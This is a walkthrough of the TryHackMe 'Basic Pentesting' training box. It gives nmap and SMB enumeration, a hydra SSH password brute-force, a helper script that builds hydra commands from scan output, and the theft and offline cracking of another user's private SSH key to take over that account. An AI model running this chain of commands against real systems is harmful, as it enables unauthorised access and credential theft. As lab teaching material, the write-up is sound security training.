Basic Pentesting
From the TryHackMe room Basic Pentesting.
Start the machine. Target IP: 10.10.227.255
# nmap port scan
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
8009/tcp open ajp13 Apache Jserv (Protocol v1.3)
8080/tcp open http Apache Tomcat 9.0.7
# gobuster directory scan
/.hta (Status: 403)
/.htaccess (Status: 403)
/.htpasswd (Status: 403)
/development (Status: 301)
/index.html (Status: 200)
/server-status (Status: 403)
Two notes are found under /development. The first:
2018-04-23: I've been messing with that struts stuff, and it's pretty cool! I think it might be neat
to host that on this server too. Haven't made any real web apps yet, but I have tried that example
you get to show off how it works (and it's the REST version of the example!). Oh, and right now I'm
using version 2.5.12, because other versions were giving me trouble. -K
2018-04-22: SMB has been configured. -K
2018-04-21: I got Apache set up. Will put in our content later. -J
The second:
For J:
I've been auditing the contents of /etc/shadow to make sure we don't have any weak credentials,
and I was able to crack your hash really easily. You know our password policy, so please follow
it? Change that password ASAP.
-K
Following the hint, how about using SMB to find usernames? enum4linux ships in the room's tools directory:
/root/Desktop/Tools/Miscellaneous/enum4linux.pl -a 10.10.227.255
S-1-22-1-1000 Unix User\kay (Local User)
S-1-22-1-1001 Unix User\jan (Local User)
Two local users, kay and jan. The second note complains that J's password was cracked easily, so jan is the one to go after.
Brute-force jan's SSH password with hydra. -t 4 keeps the number of parallel connections low, which hydra itself recommends for ssh because sshd caps concurrent unauthenticated connections (MaxStartups) and drops the rest:
hydra -t 4 -l jan -P /usr/share/wordlists/rockyou.txt 10.10.227.255 ssh
......this took a long time, roughly ten minutes.
password: armando
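The enumeration above ends with a single username typed by hand into hydra. The script below is an added example, not part of the original write-up or the room, showing how the nmap and enum4linux output from this page can be parsed into hydra's inputs instead: it pulls the open TCP ports out of nmap's normal output, pulls the local user names out of enum4linux's SID-cycling lines, and only builds the ssh brute-force command (using hydra's real -L/-P/-t flags) when port 22 is actually open. The two sample outputs are constructed copies of the lines shown above, padded with a filtered port and an enum4linux status line to show that non-matching lines are ignored; the hydra command is printed rather than executed so the script runs offline.

```shell
#!/bin/sh
# Added example: turn nmap + enum4linux output into hydra inputs.
# Sample outputs are constructed from the walkthrough's lines above.

NMAP_SAMPLE='PORT     STATE    SERVICE     VERSION
22/tcp   open     ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
80/tcp   open     http        Apache httpd 2.4.18 ((Ubuntu))
139/tcp  open     netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open     netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
8009/tcp open     ajp13       Apache Jserv (Protocol v1.3)
8080/tcp open     http        Apache Tomcat 9.0.7
9999/tcp filtered abyss'

ENUM_SAMPLE="[+] Enumerating users using SID S-1-22-1 and logon username '', password ''
S-1-22-1-1000 Unix User\\kay (Local User)
S-1-22-1-1001 Unix User\\jan (Local User)"

# Print open TCP port numbers, one per line, from nmap's normal output.
# Header lines and closed/filtered ports do not match the pattern.
nmap_open_ports() {
    awk '/^[0-9]+\/tcp +open +/ { split($1, f, "/"); print f[1] }'
}

# Print local usernames from enum4linux's Unix-user SID lines
# ("S-1-22-1-NNNN Unix User\name (Local User)"); everything else is dropped.
enum4linux_users() {
    sed -n 's/^S-1-22-1-[0-9]* Unix User\\\([^ ]*\) (Local User).*/\1/p'
}

# Build the hydra command line for an ssh brute-force over a user list.
# -t 4 stays under sshd's MaxStartups limit on unauthenticated connections.
hydra_ssh_command() {
    target=$1; userlist=$2; wordlist=$3
    printf 'hydra -t 4 -L %s -P %s %s ssh\n' "$userlist" "$wordlist" "$target"
}

# Usage: only attempt ssh if the scan actually showed 22/tcp open.
TARGET=10.10.227.255
USERS="${TMPDIR:-/tmp}/users.txt"
if printf '%s\n' "$NMAP_SAMPLE" | nmap_open_ports | grep -qx 22; then
    printf '%s\n' "$ENUM_SAMPLE" | enum4linux_users > "$USERS"
    hydra_ssh_command "$TARGET" "$USERS" /usr/share/wordlists/rockyou.txt
fi
```

On the real box the two printf pipelines are replaced by `nmap -sV` and `enum4linux.pl -a` output piped through the same functions; the user list then covers both kay and jan rather than the one name picked by hand.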
Following the hint, run LinEnum on the box as jan to find a way into another account over ssh:
https://github.com/rebootuser/LinEnum (works out of the box)
Among its findings is a private SSH key that jan is able to read:
/home/kay/.ssh/id_rsa
Copy the key to the attacking machine and crack its passphrase offline with ssh2john and john:
ssh2john rsa_a.id_rsa > id_rsa_hash.txt
john --wordlist=/usr/share/wordlists/rockyou.txt id_rsa_hash.txt
The passphrase is
beeswax (cracked almost instantly)
Log in as kay with the key. ssh refuses a private key file whose permissions are wider than 0600, so restrict the copied file's mode first, then enter beeswax at the passphrase prompt:
ssh -i id_rsa kay@10.10.227.255
That completes the box.